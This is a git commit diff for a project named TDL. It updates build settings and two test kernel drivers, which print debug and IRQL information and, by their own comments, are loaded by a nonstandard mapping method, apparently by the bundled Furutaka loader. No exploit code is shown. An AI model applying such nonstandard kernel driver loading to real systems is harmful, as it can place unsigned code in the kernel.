nopriest
/
TDL
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

v 1.1.1 

Update for Windows 10rs2 (15063)
This commit is contained in:
hfiref0x 2017-04-20 16:52:12 +07:00
parent 7e4aec975f
commit 9db2618d9e
16 changed files with 379 additions and 492 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Furutaka.exe
View File

Binary file not shown.

BIN
Compiled/dummy.sys
View File

Binary file not shown.

BIN
Compiled/dummy2.sys
View File

Binary file not shown.

2
Source/DummyDrv/dummy.sln
View File

@ -1,7 +1,7 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject

138
Source/DummyDrv/dummy/dummy.vcxproj
View File

@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>

54
Source/DummyDrv/dummy/main.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 1.00
* VERSION: 1.01
*
* DATE: 29 Jan 2016
* DATE: 20 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -33,31 +33,53 @@ NTSTATUS DriverEntry(
_In_ PUNICODE_STRING RegistryPath
)
{
LARGE_INTEGER tm;
PEPROCESS Process;
tm.QuadPart = -10000000;
KIRQL Irql;
PWSTR sIrql;
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry);
Process = PsGetCurrentProcess();
do {
KeDelayExecutionThread(KernelMode, FALSE, &tm);
DbgPrint("I'm at %s, Process : %lu (%p)",
DbgPrint("I'm at %s, Process : %lu (%p)\n",
__FUNCTION__,
(ULONG)PsGetCurrentProcessId(),
Process
);
Process);
Irql = KeGetCurrentIrql();
} while (1);
switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%ws\n", sIrql);
return STATUS_SUCCESS;
}

2
Source/DummyDrv2/dummy.sln
View File

@ -1,7 +1,7 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject

138
Source/DummyDrv2/dummy/dummy.vcxproj
View File

@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>

109
Source/DummyDrv2/dummy/main.c
View File

@ -1,12 +1,14 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 1.00
* VERSION: 1.01
*
* DATE: 29 Jan 2016
* DATE: 20 Apr 2017
*
* "Driverless" example #2
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -19,6 +21,51 @@
#define DEBUGPRINT
/*
* PrintIrql
*
* Purpose:
*
* Debug print current irql.
*
*/
VOID PrintIrql()
{
KIRQL Irql;
PWSTR sIrql;
Irql = KeGetCurrentIrql();
switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql);
}
/*
* DevioctlDispatch
*
@ -168,26 +215,6 @@ NTSTATUS CloseDispatch(
return Irp->IoStatus.Status;
}
VOID ListModules(
_In_ struct _DRIVER_OBJECT *DriverObject
)
{
PLIST_ENTRY entry0, entry1;
KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection;
if (section == NULL)
return;
entry0 = section->InLoadOrderLinks.Flink;
entry1 = entry0;
do {
section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
DbgPrint("Section=%p, %wZ", section, section->BaseDllName);
entry1 = entry1->Flink;
} while (entry1 != entry0);
}
/*
* DriverInitialize
*
@ -202,37 +229,33 @@ NTSTATUS DriverInitialize(
)
{
NTSTATUS status;
UNICODE_STRING SymLink, DevName/*, DrvRefName*/;
UNICODE_STRING SymLink, DevName;
PDEVICE_OBJECT devobj;
ULONG t;
WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 };
WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 };
// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 };
// PDRIVER_OBJECT driverObject;
//RegistryPath is NULL
UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
DbgPrint("%s\n", __FUNCTION__);
#endif
RtlInitUnicodeString(&DevName, szDevName);
RtlInitUnicodeString(&DevName, L"\\Device\\TDLD");
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status);
DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status);
#endif
if (!NT_SUCCESS(status)) {
return status;
}
RtlInitUnicodeString(&SymLink, szSymLink);
RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD");
status = IoCreateSymbolicLink(&SymLink, &DevName);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status);
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status);
#endif
devobj->Flags |= DO_BUFFERED_IO;
@ -246,17 +269,6 @@ NTSTATUS DriverInitialize(
DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload
devobj->Flags &= ~DO_DEVICE_INITIALIZING;
/*
RtlInitUnicodeString(&DrvRefName, szNullDrv);
if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0,
*IoDriverObjectType, KernelMode, NULL, &driverObject)))
{
DbgPrint("drvObj %p", driverObject);
ListModules(driverObject);
ObDereferenceObject(driverObject);
}
*/
return status;
}
@ -275,21 +287,22 @@ NTSTATUS DriverEntry(
{
NTSTATUS status;
UNICODE_STRING drvName;
WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 };
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
PrintIrql();
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
DbgPrint("%s\n", __FUNCTION__);
#endif
RtlInitUnicodeString(&drvName, szDrvName);
RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD");
status = IoCreateDriver(&drvName, &DriverInitialize);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status);
DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status);
#endif
return status;

43
Source/DummyDrv2/dummy/main.h
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.H
*
* VERSION: 1.00
* VERSION: 1.01
*
* DATE: 29 Jan 2016
* DATE: 20 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -24,21 +24,6 @@ IoCreateDriver(
IN PDRIVER_INITIALIZE InitializationFunction
);
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
__in PUNICODE_STRING ObjectName,
__in ULONG Attributes,
__in_opt PACCESS_STATE AccessState,
__in_opt ACCESS_MASK DesiredAccess,
__in POBJECT_TYPE ObjectType,
__in KPROCESSOR_MODE AccessMode,
__inout_opt PVOID ParseContext,
__out PVOID *Object
);
extern POBJECT_TYPE *IoDriverObjectType;
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
DRIVER_DISPATCH DevioctlDispatch;
_Dispatch_type_(IRP_MJ_CREATE)
@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM {
ULONG Param3;
ULONG Param4;
} INOUT_PARAM, *PINOUTPARAM;
typedef struct _KLDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
PVOID ExceptionTable;
ULONG ExceptionTableSize;
// ULONG padding on IA64
PVOID GpValue;
PVOID NonPagedDebugInfo;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Unused5;
PVOID SectionPointer;
ULONG CheckSum;
// ULONG padding on IA64
PVOID LoadedImports;
PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;

12
Source/Furutaka/Furutaka.vcxproj
View File

@ -53,7 +53,7 @@
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@ -78,23 +78,23 @@
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<Optimization>Full</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling>
